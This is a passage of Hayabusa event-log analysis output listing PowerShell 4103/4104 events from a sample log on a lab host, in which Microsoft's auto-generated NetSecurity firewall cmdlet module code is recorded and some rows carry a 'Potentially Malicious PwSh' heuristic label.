[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallApplicationFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallApplicationFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.300 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral 
Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.301 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.302 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.302 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallApplicationFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.338 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 
'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] 
[string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query 
(cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() 
if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.338 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = 
$myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = 
$script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleFilterByInterface', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and 
(@('ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallInterfaceFilter' -Alias '*' function Set-NetFirewallInterfaceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${InterfaceAlias}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InterfaceAlias'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallInterfaceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallInterfaceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.338 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.339 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.339 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.340 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallInterfaceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.370 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious 
PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetInterfaceTypeFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallInterfaceTypeFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType[]] ${InterfaceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
